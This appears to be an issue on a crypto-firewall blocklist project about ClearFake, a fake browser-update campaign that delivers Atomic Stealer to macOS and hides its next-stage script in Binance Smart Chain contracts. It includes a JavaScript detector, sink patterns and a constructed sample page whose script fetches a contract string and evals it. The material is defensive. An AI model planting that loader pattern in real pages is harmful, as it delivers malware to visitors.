Enhancement idea
ClearFake
macOS Update malware
Description
In an interesting new development, AMOS (Atomic Stealer) is now being delivered to Mac users via a fake browser update chain tracked as 'ClearFake'. This may very well be the first time one of the main social engineering campaigns, previously reserved for Windows, branches out not only in terms of geolocation but also operating system.
In October 2023, the operation took a significant step: it started using Binance Smart Chain contracts to hide the malicious scripts that drive the infection chain on the blockchain, so the next stage is fetched from a contract rather than from a conventional host. That part was already blocked in issue: https://github.com/chartingshow/crypto-firewall/issues/151
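Added example (not code from the crypto-firewall project or from the Malwarebytes write-up): a small static check for the technique described above, where a compromised page pulls its next-stage script out of a Binance Smart Chain contract through a JSON-RPC `eth_call` and then executes it. The RPC hostnames, sink patterns, placeholder contract address and the two sample pages are this example's own assumptions; the `decodeAbiString` helper shows how an `eth_call` result for a function returning `string` is unpacked, which is the step an analyst needs in order to see what a contract actually serves.

```javascript
// Added example, not ClearFake's loader. Flags inline scripts that read from a
// BSC JSON-RPC endpoint AND hand the result to a code-execution sink.
// Assumptions: hostnames and sink list are this example's heuristics.

const BSC_RPC_HOSTS = [
  "bsc-dataseed.binance.org", // public BSC RPC endpoints: legitimate infra, not IOCs
  "bsc-dataseed1.defibit.io",
  "bsc-dataseed1.ninicoin.io",
];

// Sinks a loader would feed the fetched string into.
const DYNAMIC_SINKS = [
  { name: "eval", re: /\beval\s*\(/ },
  { name: "Function", re: /\bnew\s+Function\s*\(/ },
  { name: "script-injection", re: /createElement\s*\(\s*["']script["']\s*\)/ },
  { name: "document.write", re: /document\.write\s*\(/ },
];

function extractInlineScripts(html) {
  const scripts = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) scripts.push(m[1]);
  return scripts;
}

function scanPage(html) {
  const js = extractInlineScripts(html).join("\n");
  const rpcHosts = BSC_RPC_HOSTS.filter((h) => js.includes(h));
  const usesEthCall = /["']eth_call["']/.test(js);
  const sinks = DYNAMIC_SINKS.filter((s) => s.re.test(js)).map((s) => s.name);
  // A dApp may legitimately talk to BSC; the combination with a sink is the signal.
  return { rpcHosts, usesEthCall, sinks, suspicious: rpcHosts.length > 0 && usesEthCall && sinks.length > 0 };
}

// eth_call on a contract function returning `string` yields ABI-encoded hex:
// 32-byte offset, 32-byte length, then the UTF-8 bytes padded to 32 bytes.
function decodeAbiString(hexResult) {
  const hex = hexResult.startsWith("0x") ? hexResult.slice(2) : hexResult;
  const offset = parseInt(hex.slice(0, 64), 16) * 2; // bytes -> hex chars
  const len = parseInt(hex.slice(offset, offset + 64), 16);
  const body = hex.slice(offset + 64, offset + 64 + len * 2);
  const bytes = Uint8Array.from(body.match(/../g) || [], (b) => parseInt(b, 16));
  return new TextDecoder().decode(bytes);
}

// Constructed sample: a fake "update your browser" page whose inline script
// reads a contract's get() (selector 0x6d4ce63c; all-zero address is a placeholder).
const SAMPLE_COMPROMISED_PAGE = `<html><body>
<div id="update">Your browser is out of date. Click Update.</div>
<script>
fetch("https://bsc-dataseed.binance.org/", { method: "POST",
  body: JSON.stringify({ jsonrpc: "2.0", id: 1, method: "eth_call",
    params: [{ to: "0x0000000000000000000000000000000000000000", data: "0x6d4ce63c" }, "latest"] }) })
  .then((r) => r.json())
  .then((j) => eval(decodeAbiString(j.result)));
</script></body></html>`;

// Constructed benign sample: no blockchain RPC, no code sink.
const SAMPLE_BENIGN_PAGE = `<html><body><p id="p"></p>
<script>fetch("/api/status").then((r) => r.json()).then((j) => { document.getElementById("p").textContent = j.msg; });</script>
</body></html>`;

// Constructed eth_call result encoding the string "var x=1;".
const SAMPLE_ETH_CALL_RESULT =
  "0x" +
  "20".padStart(64, "0") +              // offset of the string data = 32 bytes
  "08".padStart(64, "0") +              // length = 8 bytes
  "76617220783d313b".padEnd(64, "0");   // "var x=1;" padded to 32 bytes

console.log(scanPage(SAMPLE_COMPROMISED_PAGE));      // suspicious: true
console.log(scanPage(SAMPLE_BENIGN_PAGE));           // suspicious: false
console.log(decodeAbiString(SAMPLE_ETH_CALL_RESULT)); // "var x=1;"
```

Run `scanPage` over saved copies of pages you suspect were injected; a hit means the page both talks to a BSC RPC endpoint and evaluates what comes back, which a legitimate dApp front end rarely does. Treat it as a triage heuristic rather than a verdict: the loader can reach the same endpoints through a web3 library instead of a raw `fetch`, so extend `BSC_RPC_HOSTS` and `DYNAMIC_SINKS` as you see variants.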
Links
https://www.malwarebytes.com/blog/threat-intelligence/2023/11/atomic-stealer-distributed-to-mac-users-via-fake-browser-updates
https://urlhaus.abuse.ch/browse/tag/ClearFake/
https://threatfox.abuse.ch/browse.php?search=malware%3AClearFake
IOC
I2P websites
n/a
IPFS websites
n/a
Tor2web websites
n/a
TOR websites
n/a
URLs
n/a
Folders
n/a
Sub-Domains
n/a
Domains
IPs
Emails
n/a
Wallet addresses
n/a
Mining pool addresses
n/a